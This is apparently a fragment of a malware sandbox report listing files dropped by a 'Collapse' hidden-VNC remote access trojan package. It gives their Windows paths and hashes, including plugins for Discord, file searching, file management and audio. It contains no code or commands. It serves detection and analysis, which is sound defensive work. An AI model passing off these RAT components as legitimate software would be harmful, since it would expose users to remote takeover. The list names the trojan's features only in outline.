| SHA512 | dd36040e57f2744437684e257caac0987a90deac0a60536f1cb8d690e256505d427931a3beb8d58f87c2c1bf5beb0a40c4b09417c451a07e5856044efbac1449 |
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\DevExpress.WinRTPresenter.Launcher.exe
| MD5 | de4449ac523ac31f66efe7f090360f71 |
| SHA1 | de7fcb8c16c7cab8255b8e31781efb0ffc45acce |
| SHA256 | 76a868948e5b4df73f5dab5606135f6bf10b598bdaa991737224edcb8fdd58db |
| SHA512 | d43021c5878f08c38264e1882313959aa51b8dabf6649a64f476f3e7c0ba7fdaaac0f3edaa6fb3ea2e56889a5e78791236c1dfe8dbcd9218d7eab30a9ee4a56c |
C:\Users\Admin\AppData\Local\Collapse_RAT\Collapse.exe_Url_sbcnndr00mvtocpxr2tquumt2yizqsdq\1.5.0.0\user.config
| MD5 | 416afa3ab63684bfbb2fc0d627741358 |
| SHA1 | 9a9daaf75cc63cabb33cdf9a21d2c55e72dfffef |
| SHA256 | ae9bbbf6afc70f293f51fe103f9e8f65d5146eec86a20f3b746611549a065138 |
| SHA512 | 742f19b3cb870c6e819449a285344358c3698d26519c2d151a24d1c13ce90cb5a452cb0b399969ce63546da3d0f5d5e012cc19ff9bc0ba0396f310c748ffe4d0 |
C:\Users\Admin\AppData\Local\Collapse_RAT\Collapse.exe_Url_sbcnndr00mvtocpxr2tquumt2yizqsdq\1.5.0.0\user.config
| MD5 | 9f7263447a7147f27794207b622e7bed |
| SHA1 | fb237d0308cd229b53ebdd1fac800c2d2e8eb0fb |
| SHA256 | 630731e94e34a01060cca637ea1bac6bec99bb7eaa4d747910e6cc166890149e |
| SHA512 | a4e8f23db0c73e198e127cdff38507b4173701b99fdfc6bb3af62f398247d368c8208ac9177f710709d0692a47d4f96239e494054244a5373ce4395dfc63ea48 |
C:\Users\Admin\Desktop\Client.exe
| MD5 | 806c4a1e3eb79086789467aba1721627 |
| SHA1 | 6fd6541ac570c661f538c505180925c71cc29642 |
| SHA256 | f236915f94b0cd07caf0b94c38a977c57d5eafc24a36895f91d74fb63d44f928 |
| SHA512 | 57d234990fd1e93fcd0dbc0cb11b1c02d48067326626b9a84d0e135986d9503397133d6180436a55b9948e4a34d4553ba5575d8a2a83636813d6ddea4cc1d6b0 |
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\IP2Region.dll
| MD5 | cd5a0b0d309fd5837ddacbf4c1a65cda |
| SHA1 | 65fbc931f4ba8c5e3b26719665ee9ea6015f402c |
| SHA256 | b0c2a6951dae794c210fbe68d7f42081e5da0f7cbb926cf986c3d453f9920f37 |
| SHA512 | 84e4e1aa3f6c3014b39b0ac0da3db41e086dfab4e7d38a154f0ff2d0c65bae87039175e54cf950a57f21f5c56c19a62d6f98b2143f14a21d743867a2b37243aa |
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Plugins\Fun.dll
| MD5 | 6498fbaa8d0f46e9cc7eb5350db0d226 |
| SHA1 | 2b6502e636cf3a307fdd9417c33215e95fe133ce |
| SHA256 | 1aacbe29bc2ba2fa3b23e632ba4d0f31b21d9b7517230af75b943eed06e42c10 |
| SHA512 | 3df2476cff49da2e322693ff5751d8cbbbffa03e063e9a74b3141e95f99e03a6ddc84d4ded4d2bd28937135e73615f6b9d810741a864d196c7aab4089d744c6e |
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Plugins\Discord.dll
| MD5 | 7a9892f86badfa7560fd9182a775fb73 |
| SHA1 | 4ac58c122bdf7ad51e3ba8ff6151b545a258ec34 |
| SHA256 | 84c4a1f90507955ce9ff3e8c260bbacdb57b4d230853d2fe1379fdbc98938c7b |
| SHA512 | 6b646d83011444972c8b9b38f886035d4bef498d40299ebc3f80da1fc7b3d3b02fbdff1fb355574059f1a6309ebaeeba7aa8f7aa26c99b7452bcaa1ad04259ec |
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Plugins\FileSearcher.dll
| MD5 | 965f3d108d5995ba6214b32ce416d669 |
| SHA1 | 3c2c219e053b3a692e37a59cd28db702da2af8d9 |
| SHA256 | 05ee33a9f85545c43fbab3443751cdd0b151147f4665cfd3a661bae610b8e6b0 |
| SHA512 | f6d041219f5f5f1ee270812e5b4565465ce7c245636661d296a4dbd93b672bf1c3eaff890f84766c8f6b81ca14d5680e9bf8ed0c8a470018733c38dcb3897753 |
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Plugins\FileManager.dll
| MD5 | 5d429feae7e6513205802ccdd0012a90 |
| SHA1 | 0262c5caa56e33af56ac1e2799bfe9fd5f4f5977 |
| SHA256 | b2417948b649d6575597e82c87903a83b0d575776180b5aa3f4c2fb03504b488 |
| SHA512 | db865c7262330818682e3d6a011e07ff6b79c70ba3507e1206cbf2b88b9d9e4bbf888384b71ce27993296c21f2a883aa8de6f435aaf9a7a8a6e8a2c80720b468 |
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Plugins\Extra.dll
| MD5 | f5bf218ad015cae03530be7c8f0868a9 |
| SHA1 | d47c3936fded28dd4330f1aac7881d8bb17a1d02 |
| SHA256 | 42b16d214b9336027c3e854c119739fac4cceac6e91045f69d1db18144b538bd |
| SHA512 | a6c5a0cf8834de88b8df202c94de30521af3e7f8edfa213e896dac1c03096faa128fa38555bd9683d3d5819cdd34572f7cf061b9f841b823e13db9325cb5f090 |
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Plugins\Audio.dll
| MD5 | c16fccda2cdcf374df662c8035ed287c |
| SHA1 | ed32b20dde3c884d80eab36a7096fbcb9432fbeb |
| SHA256 | 158e664b0976c0ae9594d7f57ff44ba298ca50dcf43fcdb76df5ff1893537800 |
| SHA512 | 50a8b94b4089f59113a92033f685aa8037131d96423d412b53326a1c9f46529654e0776858977aae1448b4be3b16cd83c9eda5cf5352464a156f2343ff7c5480 |